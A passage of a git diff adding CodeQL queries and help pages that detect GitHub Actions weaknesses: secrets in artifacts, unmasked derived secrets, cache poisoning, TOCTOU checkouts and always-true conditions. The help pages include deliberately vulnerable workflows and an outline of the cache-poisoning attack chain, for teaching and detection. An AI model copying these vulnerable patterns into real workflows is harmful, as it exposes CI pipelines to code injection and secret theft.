runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@v4 + with: + name: file + path: . +``` diff --git a/actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql new file mode 100644 index 000000000000..836f1c7dec28 --- /dev/null +++ b/actions/ql/src/Security/CWE-312/SecretsInArtifacts.ql @@ -0,0 +1,46 @@ +/** + * @name Storage of sensitive information in GitHub Actions artifact + * @description Including sensitive information in a GitHub Actions artifact can + * expose it to an attacker. + * @kind problem + * @problem.severity error + * @security-severity 7.5 + * @precision high + * @id actions/secrets-in-artifacts + * @tags actions + * security + * external/cwe/cwe-312 + */ + +import actions + +from UsesStep checkout, UsesStep upload +where + checkout.getCallee() = "actions/checkout" and + upload.getCallee() = "actions/upload-artifact" and + checkout.getAFollowingStep() = upload and + ( + not exists(checkout.getArgument("persist-credentials")) or + checkout.getArgument("persist-credentials") = "true" + ) and + upload.getVersion() = + [ + "v4.3.6", "834a144ee995460fba8ed112a2fc961b36a5ec5a", // + "v4.3.5", "89ef406dd8d7e03cfd12d9e0a4a378f454709029", // + "v4.3.4", "0b2256b8c012f0828dc542b3febcab082c67f72b", // + "v4.3.3", "65462800fd760344b1a7b4382951275a0abb4808", // + "v4.3.2", "1746f4ab65b179e0ea60a494b83293b640dd5bba", // + "v4.3.1", "5d5d22a31266ced268874388b861e4b58bb5c2f3", // + "v4.3.0", "26f96dfa697d77e81fd5907df203aa23a56210a8", // + "v4.2.0", "694cdabd8bdb0f10b2cea11669e1bf5453eed0a6", // + "v4.1.0", "1eb3cb2b3e0f29609092a73eb033bb759a334595", // + "v4.0.0", "c7d193f32edcb7bfad88892161225aeda64e9392", // + ] and + ( + not exists(checkout.getArgument("path")) and + upload.getArgument("path") = [".", "*"] + or + checkout.getArgument("path") + ["", "/*"] = upload.getArgument("path") + ) +select upload, "A secret is exposed in an artifact uploaded by $@", upload, + "actions/upload-artifact" diff --git a/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md new file mode 100644 index 000000000000..6c681856a7b3 --- /dev/null +++ b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.md @@ -0,0 +1,37 @@ +# Unmasked Secret Exposure + +## Description + +Secrets derived from other secrets are not know to the workflow runner and therefore not masked unless explicitly registered. + +## Recommendations + +Avoid defining non-plain secrets. For example, do not define a new secret containing a JSON object and then read properties out of it from the workflow since these read values will not be masked by the workflow runner. + +## Examples + +### Incorrect Usage + +```yaml +- env: + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + run: | + echo "$username" + echo "$password" +``` + +### Correct Usage + +```yaml +- env: + username: ${{ secrets.AZURE_CREDENTIALS_CLIENT_ID }} + password: ${{ secrets.AZURE_CREDENTIALS_CLIENT_SECRET }} + run: | + echo "$username" + echo "$password" +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) diff --git a/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql new file mode 100644 index 000000000000..961af6f267be --- /dev/null +++ b/actions/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql @@ -0,0 +1,19 @@ +/** + * @name Unmasked Secret Exposure + * @description Secrets derived from other secrets are not masked by the workflow runner. + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/unmasked-secret-exposure + * @tags actions + * security + * external/cwe/cwe-312 + */ + +import actions + +from Expression expr +where expr.getExpression().regexpMatch("(?i).*fromjson\\(secrets\\..*\\)\\..*") +select expr, "An unmasked secret derived from another secret may be exposed in $@", expr, + expr.getExpression() diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md new file mode 100644 index 000000000000..667c41dc153e --- /dev/null +++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md @@ -0,0 +1,83 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow is vulnerable to code injection in a non-privileged job but in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: {} + runs-on: ubuntu-latest + steps: + - run: | + echo ${{ github.event.comment.body }} +``` + +### Correct Usage + +The following workflow is not vulnerable to code injections even if it runs in the context of the default branch. + +```yaml +name: Secure Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: {} + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + echo "$BODY" +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql new file mode 100644 index 000000000000..23e1f223073f --- /dev/null +++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -0,0 +1,48 @@ +/** + * @name Cache Poisoning via low-privileged code injection + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/cache-poisoning/code-injection + * @tags actions + * security + * external/cwe/cwe-349 + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import codeql.actions.security.CachePoisoningQuery +import CodeInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob job, Event event +where + CodeInjectionFlow::flowPath(source, sink) and + job = sink.getNode().asExpr().getEnclosingJob() and + job.getATriggerEvent() = event and + // job can be triggered by an external user + event.isExternallyTriggerable() and + // the checkout is not controlled by an access check + not exists(ControlCheck check | + check.protects(source.getNode().asExpr(), event, "code-injection") + ) and + // excluding privileged workflows since they can be exploited in easier circumstances + // which is covered by `actions/code-injection/critical` + not job.isPrivilegedExternallyTriggerable(event) and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(event) + or + // the workflow caller runs in the context of the default branch + event.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = job.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) +select sink.getNode(), source, sink, + "Unprivileged code injection in $@, which may lead to cache poisoning ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md new file mode 100644 index 000000000000..c12fb7998929 --- /dev/null +++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md @@ -0,0 +1,128 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow is caching an attacker-controlled file (`large_file`) in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +### Correct Usage + +The following workflow checking out untrusted files, but the cache is scoped to the Pull Request. + +```yaml +name: Secure Workflow +on: + pull_request: + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +Note, that the example above doesn't allow using secrets if the Pull Request originates from a fork. In case secrets are needed, `pull_request_target` with labels as `safe to test` can be used, but the code in Pull Request must be manually reviewed before applying the label. + +```yaml +name: Secure Workflow +on: + pull_request_target: + types: [labeled] + +jobs: + pr-comment: + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha}} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql new file mode 100644 index 000000000000..85a0f53df1dc --- /dev/null +++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -0,0 +1,71 @@ +/** + * @name Cache Poisoning via caching of untrusted files + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/cache-poisoning/direct-cache + * @tags actions + * security + * external/cwe/cwe-349 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.CachePoisoningQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +query predicate edges(Step a, Step b) { a.getNextStep() = b } + +from LocalJob job, Event event, Step source, Step step, string message, string path +where + // the job checkouts untrusted code from a pull request or downloads an untrusted artifact + job.getAStep() = source and + ( + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." and + path = source.(UntrustedArtifactDownloadStep).getPath() + ) and + // the checkout/download is not controlled by an access check + not exists(ControlCheck check | + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) + ) and + job.getATriggerEvent() = event and + // job can be triggered by an external user + event.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(event) + or + // the workflow's caller runs in the context of the default branch + event.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = job.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and + // the job writes to the cache + // (No need to follow the checkout/download step since the cache is normally write after the job completes) + job.getAStep() = step and + step instanceof CacheWritingStep and + ( + // we dont know what code can be controlled by the attacker + path = "?" + or + // we dont know what files are being cached + step.(CacheWritingStep).getPath() = "?" + or + // the cache writing step reads from a path the attacker can control + not path = "?" and isSubpath(step.(CacheWritingStep).getPath(), path) + ) and + not step instanceof PoisonableStep +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md new file mode 100644 index 000000000000..c777e1980393 --- /dev/null +++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md @@ -0,0 +1,85 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. +5. Sign the cache value cryptographically and verify the signature before usage. + +## Examples + +### Incorrect Usage + +The following workflow runs untrusted code in a non-privileged job but in the context of the default branch. + +```yaml +name: Vulnerable Workflow +on: + pull_request_target: + branches: [main] +permissions: {} +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Run tests + run: ./run_tests.sh +``` + +### Correct Usage + +The following workflow runs untrusted code in a non-privileged job and the cache is scoped to the Pull Request branch. + +```yaml +name: Secure Workflow +on: + pull_request: + branches: [main] +permissions: {} +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Run tests + run: ./run_tests.sh +``` + +## References + +- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) +- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows) +- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/) diff --git a/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql new file mode 100644 index 000000000000..95adcfaf78ec --- /dev/null +++ b/actions/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -0,0 +1,62 @@ +/** + * @name Cache Poisoning via execution of untrusted code + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/cache-poisoning/poisonable-step + * @tags actions + * security + * external/cwe/cwe-349 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.CachePoisoningQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +query predicate edges(Step a, Step b) { a.getNextStep() = b } + +from LocalJob job, Event event, Step source, Step step, string message, string path +where + // the job checkouts untrusted code from a pull request or downloads an untrusted artifact + job.getAStep() = source and + ( + source instanceof PRHeadCheckoutStep and + message = "due to privilege checkout of untrusted code." and + path = source.(PRHeadCheckoutStep).getPath() + or + source instanceof UntrustedArtifactDownloadStep and + message = "due to downloading an untrusted artifact." and + path = source.(UntrustedArtifactDownloadStep).getPath() + ) and + // the checkout/download is not controlled by an access check + not exists(ControlCheck check | + check.protects(source, event, ["untrusted-checkout", "artifact-poisoning"]) + ) and + job.getATriggerEvent() = event and + // job can be triggered by an external user + event.isExternallyTriggerable() and + ( + // the workflow runs in the context of the default branch + runsOnDefaultBranch(event) + or + // the workflow's caller runs in the context of the default branch + event.getName() = "workflow_call" and + exists(ExternalJob caller | + caller.getCallee() = job.getLocation().getFile().getRelativePath() and + runsOnDefaultBranch(caller.getATriggerEvent()) + ) + ) and + // the job executes checked-out code + // (The cache specific token can be leaked even for non-privileged workflows) + source.getAFollowingStep() = step and + step instanceof PoisonableStep and + // excluding privileged workflows since they can be exploited in easier circumstances + not job.isPrivileged() +select step, source, step, + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md new file mode 100644 index 000000000000..4e9b389834e8 --- /dev/null +++ b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md @@ -0,0 +1,102 @@ +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) + +## Description + +Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + +## Recommendations + +Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: + +- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. +- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. + +## Examples + +### Incorrect Usage (Deployment Environment Approval) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage (Deployment Environment Approval) + +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + - run: ./cmd +``` + +### Incorrect Usage (Label Gates) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +### Correct Usage (Label Gates) + +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +## References + +- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU) diff --git a/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql new file mode 100644 index 000000000000..2aacf20b35fc --- /dev/null +++ b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -0,0 +1,32 @@ +/** + * @name Untrusted Checkout TOCTOU + * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/untrusted-checkout-toctou/critical + * @tags actions + * security + * external/cwe/cwe-367 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +query predicate edges(Step a, Step b) { a.getNextStep() = b } + +from MutableRefCheckoutStep checkout, PoisonableStep step, Event event +where + // the checked-out code may lead to arbitrary code execution + checkout.getAFollowingStep() = step and + // the checkout occurs in a privileged context + inPrivilegedContext(checkout, event) and + // the mutable checkout step is protected by an Insufficient access check + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) +select step, checkout, step, + "Insufficient protection against execution of untrusted code on a privileged workflow ($@).", + event, event.getName() diff --git a/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md new file mode 100644 index 000000000000..4e9b389834e8 --- /dev/null +++ b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md @@ -0,0 +1,102 @@ +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) + +## Description + +Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + +## Recommendations + +Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: + +- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. +- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. + +## Examples + +### Incorrect Usage (Deployment Environment Approval) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage (Deployment Environment Approval) + +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. + +```yml +on: + pull_request_target: + types: [Created] +jobs: + test: + environment: NeedsApproval + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + - run: ./cmd +``` + +### Incorrect Usage (Label Gates) + +The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +### Correct Usage (Label Gates) + +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: ./cmd +``` + +## References + +- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU) diff --git a/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql new file mode 100644 index 000000000000..dde6ae69c488 --- /dev/null +++ b/actions/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -0,0 +1,30 @@ +/** + * @name Untrusted Checkout TOCTOU + * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/untrusted-checkout-toctou/high + * @tags actions + * security + * external/cwe/cwe-367 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps +import codeql.actions.security.ControlChecks + +from MutableRefCheckoutStep checkout, Event event +where + // there are no evidences that the checked-out gets executed + not checkout.getAFollowingStep() instanceof PoisonableStep and + // the checkout occurs in a privileged context + inPrivilegedContext(checkout, event) and + // the mutable checkout step is protected by an Insufficient access check + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) +select checkout, + "Insufficient protection against execution of untrusted code on a privileged workflow ($@).", + event, event.getName() diff --git a/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md new file mode 100644 index 000000000000..1e7ea120cbaa --- /dev/null +++ b/actions/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md @@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Omit `${{` and `}}` in `if` conditions: + + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` + +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` + +2. Do not include trailing new lines or spaces: + + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +## References + +- [Expression Always True Github 